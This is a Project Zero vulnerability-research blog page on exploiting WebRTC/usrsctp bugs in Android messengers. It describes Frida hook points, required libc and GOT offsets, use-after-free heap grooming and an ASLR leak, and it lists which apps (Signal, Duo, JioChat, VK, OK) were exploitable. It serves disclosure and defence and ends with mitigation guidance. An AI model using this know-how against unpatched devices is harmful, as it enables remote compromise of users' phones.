Project Zero

News and updates from the Project Zero team at Google

Exploiting Android Messengers with WebRTC: Part 3

August 6, 2020 - 20:05
Posted by Natalie Silvanovich, Project Zero
This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. CVE-2020-6514 discussed in the blog post was fixed on July 14 with these CLs. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down.
Part 3: Which Messengers?
In Part 2, I described an exploit for WebRTC on Android. In this section, I explore which applications it works on.
The exploit
When writing the exploit, I originally altered the SCTP packets sent to the target device by modifying the source of WebRTC and recompiling it. This wasn’t practical for attacking closed-source applications, so I eventually switched to using Frida to hook the binary on the attacking device instead. Frida’s hooking functionality allows for code to be executed before and after a specific native function is called, which allowed my exploit to alter outgoing SCTP packets as well as inspect incoming ones. Functionally, it is equivalent to altering the source of the attacking client, but instead of the alterations being made in the source at compile time, they are made dynamically by Frida at run time. The source for the exploit is available here.
There are seven functions that the attacking device needs to hook, as follows.
usrsctp_conninput // receives incoming SCTP
DtlsTransport::SendPacket // sends outgoing SCTP
cricket::SctpTransport::SctpTransport // detects when SCTP transport is ready
calculate_crc32c // calculates checksum for SCTP packets
sctp_hmac // performs HMAC to guess secret key
sctp_hmac_m // signs SCTP packet
SrtpTransport::ProtectRtp // suppresses RTP to reduce heap noise
These functions can be hooked as symbols, or as offsets in the binary.
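As an illustration of the simplest function in the list above, the sketch below computes CRC32c, the checksum that SCTP packets carry (RFC 4960). A packet that is altered after usrsctp has built it no longer matches its checksum, which is presumably why the exploit needs calculate_crc32c; that motivation is my reading rather than something stated here. The name crc32c is a placeholder, and this bitwise version favors clarity over speed; it is not the usrsctp implementation.

```c
#include <stddef.h>
#include <stdint.h>

/* Bitwise CRC32c (Castagnoli), reflected polynomial 0x82F63B78.
 * Illustrative only: real implementations normally use a lookup table. */
uint32_t crc32c(const uint8_t *data, size_t len)
{
    uint32_t crc = 0xFFFFFFFFu;              /* standard initial value */

    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];
        for (int bit = 0; bit < 8; bit++) {
            /* If the low bit is set, shift and XOR in the polynomial. */
            uint32_t mask = 0u - (crc & 1u);
            crc = (crc >> 1) ^ (0x82F63B78u & mask);
        }
    }
    return ~crc;                             /* standard final inversion */
}
```

When this is applied to a whole SCTP packet, the checksum field in the common header is set to zero while the value is being computed.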
There are also three address offsets from the binary of the target device that are needed for the exploit to work.  The offset between the system function and the malloc function, as well as the offset between the gadget described in the previous post and the malloc function are two of these. These offsets are in libc, which is an Android system library, so they need to be determined based on the target device’s version of Android. The offset from the location of the cricket::SctpTransport vtable to the location of malloc in the global offset table is also needed. This must be determined from the binary that contains WebRTC in the application being attacked.
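The arithmetic behind these three offsets can be sketched as follows. The struct and function names are hypothetical, and the order in which the addresses are derived (leaked vtable address, then the malloc slot in the global offset table, then system and the gadget) is my assumption about how the offsets are combined, not code taken from the exploit.

```c
#include <stdint.h>

/* Hypothetical container for the three per-target offsets. */
struct target_offsets {
    int64_t system_minus_malloc;      /* libc: &system - &malloc */
    int64_t gadget_minus_malloc;      /* libc: &gadget - &malloc */
    int64_t got_malloc_minus_vtable;  /* WebRTC binary: &GOT[malloc] - &vtable */
};

/* Address of the GOT slot that holds malloc, given a leaked vtable address. */
uint64_t got_malloc_slot(uint64_t vtable_addr, const struct target_offsets *o)
{
    return vtable_addr + (uint64_t)o->got_malloc_minus_vtable;
}

/* Address of system(), given the malloc address read from that GOT slot. */
uint64_t system_addr(uint64_t malloc_addr, const struct target_offsets *o)
{
    return malloc_addr + (uint64_t)o->system_minus_malloc;
}

/* Address of the gadget, derived from malloc in the same way. */
uint64_t gadget_addr(uint64_t malloc_addr, const struct target_offsets *o)
{
    return malloc_addr + (uint64_t)o->gadget_minus_malloc;
}
```

The two libc offsets change with the Android version of the target, while the third changes with the application binary, so a table of such structs would need one entry per target combination.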
Note that the exploit scripts provided have a serious limitation: every time memory is read, it only works if bit 31 of the pointer is set. The reasons for this are explained in Part 2. The exploit script has an example of how to fix this and read any pointer using FWD_TSN chunks, but this is not implemented for every read. For testing purposes, I reset the device until the WebRTC library was mapped in a favorable location.
Android Applications
A list of popular Android applications that integrate WebRTC was determined by searching APK files on Google Play for a specific string in usrsctp. Roughly 200 applications with more than five million users appeared to use WebRTC. I evaluated these applications to determine whether they could plausibly be affected by the vulnerabilities in the exploit, and what the impact would be.
It turned out the ways applications use WebRTC are quite varied, but can be separated into four main categories.
  • Projection: the screen and controls of a mobile application are projected into a desktop browser with user consent for enhanced usability
  • Streaming: audio and video content is sent from one user to many users. Usually there is an intermediary server, so the sender does not need to manage possibly thousands of peers, and the content is recorded for later viewing
  • Browsers: all major browsers contain WebRTC to implement the JavaScript WebRTC API
  • Conferencing: two or more users communicate via audio or video in real time

The impact of the vulnerabilities used in the exploit is different for each of these categories. Projection is low risk, as a lot of user interaction is required to set up the WebRTC connection, and the user has access to both sides of the connection in the first place, so there is little to gain by compromising the other side. 
Streaming is also fairly low risk. While it’s possible that some applications use peer-to-peer connections when a stream has a low number of viewers, they usually use an intermediary server that terminates the WebRTC connection from the sending peer, and starts new connections with the receiving peers. This means that the attacker usually cannot send malformed packets directly to a peer. Even with a set-up where streaming is performed peer-to-peer, user interaction is required for the target to view the stream, and there’s often no way to limit who can access a stream. For this reason, streaming applications that use WebRTC are probably not useful for targeted attacks. Of course, it is possible that these vulnerabilities affect the servers used by streaming services, but this was not investigated in this research.
Browsers are almost certainly vulnerable to most bugs in WebRTC, because they allow a large amount of control over how it is configured. To exploit such a bug in a browser, an attacker would need to set up a host that acts like the other peer in the peer-to-peer connection, and convince the target to visit a webpage that starts a call to that host. In this case, the vulnerability would have a similar impact to other memory corruption vulnerabilities in JavaScript.
Conferencing is the highest risk usage of WebRTC, but the actual impact of a vulnerability depends a lot on how users of an application contact each other. The highest risk design is an application where any user can contact any other user based on an identifier. Some applications require the callee to have interacted in a specific way with the caller before a call can be made, which makes it harder for an attacker to contact a target and generally reduces risk. Some applications require users to enter a code or visit a link to start a call, which has a similar effect. There is also a large group of applications where it is difficult or impossible to call a specific user, for example chat roulette applications, and applications which have features that allow a user to start a call to customer support.
For this research, I focused on conferencing applications that allow users to contact specific other users. This reduced my list of 200 applications to 14 applications, as follows.
Name                                              Installs on Play Store
Facebook Messenger                                1B
Google Duo                                        1B
Google Hangouts                                   1B
Viber                                             500M
VK                                                100M
OK and TamTam (similar apps by same vendor)       100M/10M
Discord                                           100M
JioChat                                           50M
ICQ                                               10M
BOTIM                                             10M
Signal                                            10M
Slack                                             10M
This list was compiled on June 18, 2020. Note that a few applications were removed because their server was not operational on that day, or they were very difficult to test (for example, required watching multiple ads to make a single call).
One application tested will not be identified in this blog post, as a serious additional vulnerability was discovered in the process of testing that has not yet been fixed or reached its disclosure deadline. This blog post will be updated when the disclosure deadline has passed.
Testing the Exploit
The following section describes my attempts to test the exploit against the above applications. Please note that due to the number of applications, limited time was spent on each, so there is no guarantee that every attack against WebRTC was considered. While I am very confident that applications found to be exploitable are indeed exploitable, I am less confident about applications found to be not exploitable. If you need to know whether a specific application is vulnerable for the purposes of protecting users, please contact the vendor instead of relying on this post.
Signal
I started off by testing Signal because it is the only open-source application on this list. Signal integrates WebRTC as a part of a library called ringrtc. I built ringrtc and then Signal with symbols, and then hooked the needed symbols with the Frida script on the attacker device. I tried the exploit and it worked about 90% of the time!

This attack did not require any user interaction with the target device because Signal starts the WebRTC connection before an incoming call is answered, and this connection can accept incoming RTP and SCTP. The exploit is not 100% reliable on Signal and other targets because Bug 376 requires that a freed heap allocation is replaced with the next allocation of the same size performed by the thread, and occasionally another thread will do an allocation of the same size in the meantime. Failure results in a crash that is usually not evident to the user because the process respawns, but a missed call will appear.
This exploit was performed on Signal 4.53.6 which was released on January 13, 2020, as Bug 376 had already been patched in Signal by the time I finished the exploit. CVE-2020-6514 was also fixed in later versions, and ASCONF has also been disabled in usrsctp, so the code that caused Bug 376 is no longer reachable. Signal has also recently implemented a feature that requires user interaction for the WebRTC connection to be started when the caller is not in the callee’s contacts. Signal has also stopped using SCTP in their beta version, and plans to add this change to the release client once it is tested. The source for this exploit is available here.
Google Duo
Duo was also an interesting target, as it is preinstalled on so many Android devices. It dynamically links the Android WebRTC library, with no obvious modifications. I reverse engineered this library in IDA to find the location of all the functions that needed to be hooked, and then modified the Frida script to hook them based on their offsets from an exported symbol. I also modified the offset between the cricket::SctpTransport vtable and the global offset table, as it was different than in Signal. The exploit also worked on Duo. Source for the Duo exploit is available here.

This exploit did not require any user interaction because, like Signal, Duo starts the WebRTC connection before a call is answered.
The exploit was tested on version 68.0.284888502.DR68_RC09 which was released on December 15, 2019. The vulnerability has since been fixed. Also, at the time this application was released, it was possible for Duo to call any Android device with Google Play Services installed, regardless of whether Duo had been installed. This is no longer the case. A user now needs to set up Duo and have the caller in their contacts for an incoming call to be received.
Google Hangouts
While Google Hangouts uses WebRTC, it does not use data channels, and does not exchange SDP in order to set up calls, so there is no obvious way to enable them from a peer. For that reason, the exploit does not work on Hangouts.
Facebook Messenger
Facebook Messenger is another interesting target. It has a large number of users, and according to its documentation, any user can call any other user based on their mobile number. Facebook Messenger integrates WebRTC into a library called, which dynamically links to usrsctp from another library, Facebook Messenger downloads these libraries dynamically as opposed to including them in the APK, so it is difficult to identify the version I examined, but it was downloaded on June 22, 2020. 
The library appears to use a version of WebRTC that is roughly six years old, so it was before the class cricket::SctpTransport existed. That said, the analogous class cricket::DataMediaChannel appeared to be vulnerable to CVE-2020-6514. The library appears to be more modern, but contains the vulnerable code for Bug 376. That said, it does not appear to be possible to reach this code from Facebook Messenger, as it is set to use RTP data channels as opposed to SCTP data channels, and does not accept attempts to change the channel type via Session Description Protocol (SDP). While it is not clear whether the motivation behind this design is security, this is a good example of how restricting attacker access to features can reduce an application’s vulnerability. Facebook also waits until a call is answered before starting the WebRTC connection, which further reduces the exploitability of any WebRTC vulnerabilities that affect it.
Interestingly, Facebook Messenger also contains a more modern version of WebRTC in a library called, but it does not appear to be used by the application. It is possible to get Facebook Messenger to use the alternate library by setting a system property on Android, but I could not find a way an attacker could cause a device to switch libraries.
Viber
Like Facebook Messenger, Viber version appeared to contain the vulnerable code, but the application disables SCTP when the PeerConnectionFactory is created. This means an attacker cannot reach the vulnerable code.
VK
VK is a social networking app released by in which users have to explicitly allow specific other users to contact them before each user is allowed to call them. I tested my exploit against VK, and it required some modifications to work. To start, VK doesn’t use data channels as a part of its WebRTC connection, so I had to enable it. To do this, I wrote a Frida script that hooks nativeCreateOffer in Java, and makes a call to createDataChannel before the offer is created. This was sufficient to enable SCTP on both devices, as the target device determines whether to enable SCTP based on the SDP provided by the attacker. The version of WebRTC was also older than the one I wrote the exploit for. WebRTC doesn’t contain any version information, so it is difficult to tell for sure, but the library appeared to be at least one year old based on log entries. This meant that some of the offsets in the ‘fake object’ used by the exploit were different. With a few changes, I was able to exploit VK.
VK sends an SDP offer to a target device to start a call, but the target does not return the SDP answer until the user has accepted the call, which means this exploit requires the target to answer the call before the WebRTC connection is started. This means the exploit will not work unless the target manually answers the call. In the video below, the exploit takes a fair amount of time to run after the user has answered. This is due to how I designed the exploit, and not due to fundamental limitations of the vulnerabilities it uses. In particular, the exploit waits for usrsctp to generate specific packets even though they could be generated more quickly by the exploit script, and also uses delays to avoid packet reordering when responses could be checked instead. It is likely that with enough effort, this exploit could run in less than five seconds. Also note that I altered the exploit to work with a single incoming call, as opposed to two incoming calls in the exploits above, as it is not realistic to expect a target to answer a call twice in quick succession. This didn’t require substantial changes to how the exploit works, though it does make the exploit code more complex and difficult to debug.

Regardless, the requirement that a user must choose to accept calls from an attacker before the attacker can call them, together with the requirement that the user answer the call and stay on the line for a few seconds, makes this exploit substantially less useful against VK compared to applications without these features.
Testing was performed against VK 6.7 (5631). Like Facebook, VK dynamically downloads its version of WebRTC, so it is difficult to specify its version; however, testing was performed on July 13, 2020. VK has since updated their servers so that a user cannot start a call with SDP that contains data channels, so the exploit no longer works. Note that VK does not use WebRTC for two-party calls, only group calls, so I tested this exploit using a group call. The source for the exploit is available here.
OK and TamTam
OK and TamTam are similar messaging applications released by the same vendor, also They use a dynamically downloaded version of WebRTC that is identical to the one used by VK. Since the library is exactly the same, my exploit also worked on OK, and I didn’t bother also testing TamTam because it is so similar.

Like VK, OK and TamTam do not return the SDP answer until the target has answered the call by interacting with the phone, so this is not a fully remote exploit on OK and TamTam. OK also requires users to choose to accept messages from another user before the user can call them. TamTam is a bit more liberal, for example, if a user verifies a phone number, any user who has their phone number can contact them.
Testing was performed on version 20.7.7 of OK on Monday, July 13. SDP-only testing was performed on TamTam version 2.14.0. Since then, the servers for these applications have been updated so that SDP containing data channels cannot be used to start a call, so the exploit no longer works.
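The server-side change described above, refusing call setup when the SDP contains data channels, can be sketched as a simple check for an application media section, which is where SDP negotiates data channels. This is a deliberately naive illustration with a hypothetical function name; how these vendors actually implemented their filter is not described in this post.

```c
#include <stddef.h>
#include <string.h>

/* Returns 1 if any SDP line opens an "m=application" media section
 * (the section used for data channels), otherwise 0.
 * Naive by design: it only matches the prefix at the start of a line. */
int sdp_has_application_section(const char *sdp)
{
    static const char prefix[] = "m=application ";
    const size_t prefix_len = sizeof(prefix) - 1;
    const char *line = sdp;

    while (line != NULL && *line != '\0') {
        if (strncmp(line, prefix, prefix_len) == 0)
            return 1;
        /* Advance to the character after the next newline, if any. */
        const char *newline = strchr(line, '\n');
        line = (newline != NULL) ? newline + 1 : NULL;
    }
    return 0;
}
```

A production filter would more likely parse the SDP fully and reject anything it does not explicitly expect, rather than search for one known pattern.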
Discord
Discord has documented its use of WebRTC thoroughly. The application uses an intermediary server for WebRTC connections, which means that it is not possible for a peer to send raw SCTP to another peer, which is required for the exploit to work. Discord also requires several clicks to enter a call. For these reasons, Discord is not affected by the vulnerabilities discussed in this post.
JioChat
JioChat  is a messaging application that allows for any user to call any other user based on phone number. Analyzing version, it appeared that its WebRTC integration contained both vulnerabilities, and the app exchanges the SDP offer and answer before the callee accepts the incoming call, so I expected the exploit to work without user interaction. However, this was not the case when I tested it, and it turns out that JioChat uses a different strategy to prevent the WebRTC connection from starting until the callee has accepted the call. I was able to easily bypass this strategy, and get the exploit to work on JioChat.

Unfortunately, JioChat’s connection delay strategy introduced another vulnerability, which has been fixed, but for which the disclosure period has not yet expired. For this reason, details of how to bypass it will not be shared in this blog post. The source for the exploit without this functionality is available here. JioChat has recently updated their servers so that SDP containing data channels cannot be used to start a call, meaning that the exploit no longer works on JioChat.
Slack and ICQ
Slack and ICQ are similar in that they both integrate WebRTC, but do not use the transport features of the library (note that Slack doesn’t integrate WebRTC directly for audio calls, it integrates Amazon Chime, which integrates WebRTC). They both use WebRTC for audio processing only, but implement their own transport layer and do not use WebRTC’s RTP and SCTP implementations. For this reason, they are not vulnerable to the bugs discussed in this blog post, and many other WebRTC bugs.
BOTIM
BOTIM has an unusual design that prevents the exploit from working. Instead of calling createOffer and exchanging SDP, each peer generates its own SDP based on a small amount of information from the peer. SCTP is not used by this application by default, and it was not possible to use SDP to turn it on. Therefore, it was not possible to use this exploit. BOTIM does appear to have a mode where it exchanges SDP with a peer, but I could not figure out how to enable it.
Other Application
The exploit worked in a fully remote fashion on one other application, but setting up the exploit revealed an obvious additional serious vulnerability in the application. Details of the exploit’s behavior on the application will be released after the disclosure period has expired for the vulnerability.
Discussion
The Risk of WebRTC
Out of the 14 applications analyzed, WebRTC enabled a fully remote exploit on four applications, and a one-click exploit on two more. This highlights the risk of including WebRTC in a mobile application. WebRTC does not pose a substantially different risk than other video conferencing solutions, but the decision to include video conferencing in an application introduces a large remote attack surface that wouldn’t be there otherwise. WebRTC is one of the few fully remote attack surfaces of a mobile application, and of Android in general. It is likely the highest risk component in almost every application that uses it for video conferencing.
Video conferencing is vital to the functionality of some applications, but in others it is an ‘extra’ that is rarely used. Low usage does not make video conferencing any less of a risk to users. It is important for software makers to consider whether video conferencing is a truly necessary part of their application, with a full understanding of the risk it presents to users.
WebRTC Patching
This research showed that many applications fall behind with regard to applying security updates to WebRTC. Bug 376 was fixed in September of 2019, yet only two of the 14 applications analyzed had patched it. There were several factors that led to this.
To start, usrsctp does not have a formal process for identifying and communicating vulnerabilities. Instead, Bug 376 was fixed like any other bug, so the code was not pulled into WebRTC until March 10, 2020. Even after it was patched, the bug was not noted on the Security Notes for the Chrome Stable channel, which is where WebRTC tells developers to look for security updates. This means that developers of applications that use an older version of WebRTC and cherry-pick fixes, or of applications that include usrsctp separately from WebRTC, would not be aware of the need to apply this patch.
This is not the full story though, as many applications include WebRTC as an unmodified library, and there have been other WebRTC vulnerabilities included in the Chrome Security Notes since March 2020. Another contributing factor is that until 2019, WebRTC did not provide any security patching guidance to integrators. In fact, its website inaccurately said that no vulnerabilities had ever been reported in the library. This occurred because WebRTC security bugs are generally filed in the Chromium bug tracker, and there was no process at the time for considering these bugs’ impact on non-browser integrators. Many of the applications I analyzed had versions of WebRTC that predated this, so it is likely that the legacy of this incorrect guidance still causes applications to not update WebRTC. While WebRTC has done a lot to make it easier for integrators to patch WebRTC, for example allowing large integrators to apply for advance notice of vulnerabilities, there is still likely a long tail of integrators who have only seen the old guidance. Of course, there is no guarantee that integrators would have followed better guidance if it had been available, but considering that for a long time it was very difficult for an integrator to know when and how to update WebRTC even if they wanted to, it is likely it would have had an impact.
Integrators also have a responsibility to keep WebRTC up to date with security fixes, and many of them have failed in this area. It was surprising to see so many versions of WebRTC that are well over a year old. Developers should monitor every library they integrate for security updates, and apply them promptly.
Application Design
Application design affects the risk posed by WebRTC, and many applications researched were designed well. The easiest, and most important way to limit the security impact of WebRTC is to avoid starting the WebRTC connection until the callee has accepted the call by interacting with the device. This turns an exploit that can compromise any user quickly into an exploit that requires user interaction, and won’t be successful on every target. It also makes lower quality vulnerabilities not practically exploitable, because while a fully remote exploit can be attempted many times without the user noticing, an exploit that requires a user to answer a call needs to work in a small number of tries.
Starting the WebRTC connection late has a performance impact, and precludes certain features, like giving the callee a preview of the call. Of the applications that the exploit worked on, two started the connection without user interaction, and two required user interaction. JioChat and the application we are not yet identifying tried to use unique tricks to delay the connection until the user accepted the call without performance impact, but introduced vulnerabilities as a result. Developers should be aware that the best way to delay a WebRTC connection is to avoid calling setRemoteDescription until the user has accepted the call.  Other methods might not actually delay the connection and can cause other security problems.
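The recommendation to hold back setRemoteDescription until the user accepts can be pictured as a small callee-side state machine. The sketch below is a hypothetical model in C, not WebRTC code: all names are invented for illustration, and the applied_offer field merely stands in for the point at which a real client would call setRemoteDescription.

```c
#include <stddef.h>

enum call_state { CALL_IDLE, CALL_RINGING, CALL_CONNECTING };

/* Hypothetical callee-side bookkeeping for one incoming call. */
struct callee {
    enum call_state state;
    const char *pending_offer;  /* received, but not yet given to WebRTC */
    const char *applied_offer;  /* stands in for setRemoteDescription(offer) */
};

void callee_init(struct callee *c)
{
    c->state = CALL_IDLE;
    c->pending_offer = NULL;
    c->applied_offer = NULL;
}

/* Signalling delivered an offer: ring, but keep the SDP away from WebRTC. */
void callee_on_offer(struct callee *c, const char *sdp_offer)
{
    if (c->state != CALL_IDLE)
        return;
    c->pending_offer = sdp_offer;
    c->state = CALL_RINGING;
}

/* The user answered: only now is the stored offer applied.
 * Returns 1 if the offer was applied, 0 if there was nothing to accept. */
int callee_on_accept(struct callee *c)
{
    if (c->state != CALL_RINGING || c->pending_offer == NULL)
        return 0;
    c->applied_offer = c->pending_offer;
    c->pending_offer = NULL;
    c->state = CALL_CONNECTING;
    return 1;
}

/* The user declined or the call timed out: discard the offer unused. */
void callee_on_decline(struct callee *c)
{
    callee_init(c);
}
```

The point of the design is that no path other than callee_on_accept hands the remote SDP to the media stack, so no transport can start before the user interacts with the device.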
Another way to reduce the security risk of WebRTC is to limit who an attacker can call, for example by requiring that the callee have the user in their contact list, or only allowing calls between users that have agreed to be able to message each other in the application. Like delaying the connection, this greatly reduces the targets an attacker can reach without a lot of effort.
Finally, integrators should limit the features of WebRTC an attacker can use to the features the application needs. Many applications were not vulnerable to this specific exploit because they had effectively disabled SCTP. Others did not use SCTP, but did not disable it in a way that prevented attackers from using it, and I was able to enable it. The best way to disable a feature in WebRTC is to remove it at compile time, which is supported for certain codecs. It is also possible to disable certain features through the PeerConnection and PeerConnectionFactory, and this is also very effective. Features can also be disabled by filtering SDP, but it is important to make sure that the filter is robust and tested thoroughly.
Conclusion
I wrote an exploit for WebRTC for Android involving two vulnerabilities in usrsctp. This exploit was fully remote on Signal, Google Duo, JioChat and one other application, and required user interaction on VK, OK and TamTam. Seven other messengers were not affected because they effectively disabled SCTP. Several applications used versions of WebRTC that did not include patches for either of the vulnerabilities used in the exploit. One remains unpatched. Low patch uptake is partially a result of WebRTC historically providing poor patching guidance. Integrators can reduce the risk of WebRTC by requiring user interaction to start a WebRTC connection, limiting who users can call easily and disabling unused features. They should also consider whether video conferencing is an important and necessary feature of their application.
Vendor Response
The software vendors mentioned in this blog post were given a chance to review this post before it was posted publicly, and some provided responses, as follows.
The WebRTC bug that was used both to bypass ASLR and move the instruction pointer has been fixed. WebRTC no longer passes the SctpTransport pointer directly into usrsctp, using an opaque identifier that is mapped to a SctpTransport instead, with invalid values being ignored. We have identified and patched every affected Google product and reached out to 50 applications and integrators using WebRTC, including all applications analyzed in this post. For all applications and integrators who have not yet patched the vulnerability, we recommend updating to the WebRTC M85 branch, or patching the following two commits: 1, 2.
User security is of the highest priority for all Group products, which include VK, OK, TamTam and others. Acting on the information we received regarding the vulnerability, we immediately started the process of updating our mobile apps to the latest version of WebRTC. This update is currently underway. We have also implemented algorithms on our servers that no longer allow this vulnerability to be exploited in our products. This action allowed us to fix the issue for all of our users within 3 hours of receiving the information with an exploit demonstration.
We appreciate the effort that went into finding these bugs and improving the security of the WebRTC ecosystem. Signal had already shipped a defensive patch that protected users from this exploit prior to its discovery. In addition to routine updates of our calling libraries, we continue to take proactive steps to mitigate the impact of future WebRTC bugs.
We're pleased to see that this report concludes that Slack is not impacted by the referenced WebRTC vulnerabilities and exploits. Upon learning about this risk, we undertook additional diligence and confirmed that the entirety of our Calls service is not impacted by the vulnerabilities and findings described here.
Category: Hacking & Security

Exploiting Android Messengers with WebRTC: Part 2

August 5, 2020 - 18:01
Posted by Natalie Silvanovich, Project Zero
This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 3 is scheduled for August 6.
Part 2: A Better Bug
In Part 1, I explored whether it was possible to exploit WebRTC using two memory corruption bugs in RTP processing. While I succeeded at moving the instruction pointer, I was not able to break ASLR, so I decided to look for vulnerabilities more suitable for this purpose.
usrsctp
I started off by going through WebRTC bugs I had filed in the past to see if any had the potential to break ASLR. Even if a bug was fixed long ago, it is an indicator of where similar bugs could potentially be found. One such bug was CVE-2020-6831, which is an out-of-bounds read in usrsctp.
usrsctp is an implementation of Stream Control Transmission Protocol (SCTP) used by WebRTC. Applications that use WebRTC can open data channels, which allow text or binary data to be transmitted from peer to peer. Data channels are often used to allow text messages to be exchanged during a video call, or to tell a peer when certain events have occurred, such as another peer disabling its camera. SCTP is the protocol that underlies data channels. In WebRTC, SCTP is analogous to RTP in that where RTP is used for audio and video content, SCTP is used for data.
I spent some time reviewing the usrsctp code for vulnerabilities. I eventually found CVE-2020-6831, which is a stack buffer overflow in usrsctp. This bug gives the attacker complete control of the size and contents of the overflow. Samuel Groß suggested that this bug could be used to break ASLR by overwriting the stack cookie, and then the return address one byte at a time, and detecting whether the value is correct based on whether the application crashes. Unfortunately, it turned out that this vulnerability is not reachable through WebRTC, as it requires a client socket to connect to a listening socket, meanwhile in WebRTC, both sockets are client sockets.
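The byte-at-a-time idea can be illustrated with a small simulation. Nothing below touches a real stack: the target struct, the survives_overflow oracle and the eight-byte secret are all hypothetical stand-ins, and the sketch assumes the secret stays the same between attempts, which is what makes this kind of guessing feasible at all.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define COOKIE_LEN 8

/* Simulated target holding a secret; attempts counts oracle queries. */
struct target {
    uint8_t cookie[COOKIE_LEN];
    unsigned long attempts;
};

/* Oracle: the simulated process "survives" only if the first n bytes
 * written by the overflow equal the first n bytes of the secret. */
static int survives_overflow(struct target *t, const uint8_t *guess, size_t n)
{
    t->attempts++;
    return memcmp(t->cookie, guess, n) == 0;
}

/* Recovers the secret one byte at a time. Returns 1 on success. */
int recover_cookie(struct target *t, uint8_t out[COOKIE_LEN])
{
    for (size_t i = 0; i < COOKIE_LEN; i++) {
        int found = 0;
        for (unsigned value = 0; value < 256; value++) {
            out[i] = (uint8_t)value;
            /* Overwrite bytes 0..i only; later bytes stay untouched. */
            if (survives_overflow(t, out, i + 1)) {
                found = 1;
                break;
            }
        }
        if (!found)
            return 0;
    }
    return 1;
}
```

Because each byte is confirmed independently, the search needs at most 256 guesses per byte (2048 for eight bytes) instead of 2^64 guesses for the whole value.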
I kept looking and eventually found CVE-2020-6514. This is a rather unusual bug in how WebRTC interacts with usrsctp. usrsctp supports custom transports, in which case the integrator needs to provide the source and destination address for each connection as a pair of void pointers. The non-dereferenced value of these pointers is then used as an address by usrsctp, which means the value is included in some packets. In WebRTC, the address pointers are set to the address of the SctpTransport instance used by WebRTC. The result is that the location of this object in memory is sent to the remote peer during every SCTP connection. This is technically a bug in WebRTC, though the design of usrsctp is also flawed because using the type void* for custom addresses strongly encourages integrators to use pointers for this value even though this is insecure.
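One way to avoid this class of leak is to give the library a small opaque identifier in the void* slot and to resolve it through a table, ignoring values that are not valid identifiers. The sketch below shows that pattern with hypothetical names and a fixed-size table; it is not the WebRTC code, and it ignores thread safety and identifier reuse.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_TRANSPORTS 16

/* Placeholder for the real transport object. */
struct transport { int placeholder; };

static struct transport *g_slots[MAX_TRANSPORTS];

/* Stores t and returns a non-zero identifier, or 0 if the table is full.
 * The identifier, not the pointer, is what would be cast to void* and
 * handed to the SCTP library as the "address". */
uintptr_t transport_register(struct transport *t)
{
    for (uintptr_t i = 0; i < MAX_TRANSPORTS; i++) {
        if (g_slots[i] == NULL) {
            g_slots[i] = t;
            return i + 1;
        }
    }
    return 0;
}

/* Maps an identifier back to its transport; invalid values yield NULL. */
struct transport *transport_lookup(uintptr_t id)
{
    if (id == 0 || id > MAX_TRANSPORTS)
        return NULL;
    return g_slots[id - 1];
}

/* Releases the slot so that later lookups of this identifier fail. */
void transport_unregister(uintptr_t id)
{
    if (id != 0 && id <= MAX_TRANSPORTS)
        g_slots[id - 1] = NULL;
}
```

With this arrangement, the value that ends up in SCTP packets is a small integer that says nothing about the process's memory layout, and a forged value cannot be turned into a pointer.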
I was hoping this bug would be enough to break ASLR, but it turned out not to be. For an exploit, I needed the location of a loaded library, as well as the location of the heap, so I ran a series of tests on an Android device to see if there was any correlation between these locations, but there was not any. The location of a heap pointer was not enough to determine the location of a loaded library.
I kept looking, and I noticed a vulnerability in how usrsctp processes ASCONF chunks, which are used to manage dynamic IP addresses. The source for the bug is as follows.
if (param_length > sizeof(aparam_buf)) {
    SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) larger than buffer size!\n", param_length);
    sctp_m_freem(m_ack);
    return;
}
if (param_length <= sizeof(struct sctp_paramhdr)) {
    SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) too short\n", param_length);
    sctp_m_freem(m_ack);
}
Notice that the second call to sctp_m_freem is missing a return, so the m_ack variable can be used after it is freed. After finding this bug, I noticed that it had been patched in more recent versions of usrsctp and WebRTC. I later learned that it was reported by another Googler, Mark Wodrich, as Bug 376 in usrsctp on September 19, 2019.
Revealing Memory with Bug 376
Two important questions in analyzing a use-after-free bug are what is freed, and how it is used. In Bug 376, the freed object is an mbuf structure, a type which is used to store the contents of inbound and outbound packets. The mbuf structure starts with a substructure, m_hdr, which is defined as follows.
struct m_hdr {
    struct mbuf *mh_next;     /* next buffer in chain */
    struct mbuf *mh_nextpkt;  /* next chain in queue/record */
    caddr_t mh_data;          /* location of data */
    int mh_len;               /* amount of data in this mbuf */
    int mh_flags;             /* flags; see below */
    short mh_type;            /* type of data in this mbuf */
    uint8_t pad[M_HDR_PAD];   /* word align */
};
Now, how is this structure used? Looking through the rest of the ASCONF handling, it is eventually added to an outbound packet queue to acknowledge the packet that was sent.
TAILQ_INSERT_TAIL(&stcb->asoc.asconf_ack_sent, ack, next);
This made it very likely that this bug could be used to reveal memory of a remote peer if the freed mbuf structure was replaced with a structure holding a pointer to memory that contains pointers, for example, the SctpTransport pointer revealed by CVE-2020-6514.
I tried to do this by sending RTP packets of the same size as the mbuf structure. There’s a nice trick for making a lot of allocations of a specific size that don’t get freed in WebRTC. Video packets get stored in a list before they are assembled into frames, so if the end of a frame is never sent, they will get stored forever, so long as a maximum number of packets is never hit. Unfortunately, this led to an unexpected problem. OpenSSL, which is used by WebRTC, happened to have some heap allocations of the same size as an mbuf structure, and if they happened to be allocated in the place of the freed mbuf structure, they would get written to in the mbuf send process, which for some reason would lead to an irrecoverable state in OpenSSL. The application didn’t crash; it would just get stuck in some sort of loop and refuse to accept any more connections.
So I decided it would be better to allocate the memory replacing the mbuf structure in usrsctp. SCTP allows packets containing any number of chunks to be sent to a host, and in most cases they are processed as if they were a sequence of packets. Even better, the outbound packet queue that the freed mbuf structure is added to does not send any packets until all chunks in the current packet have been processed. This means that it should be possible to send a packet that contains a chunk that triggers the bug, and then a chunk that sets the freed memory to the needed values before it is sent back to the attacker. Since no network traffic needs to occur between when the mbuf structure is freed and when its memory is safely reallocated, this avoids the problem with OpenSSL.
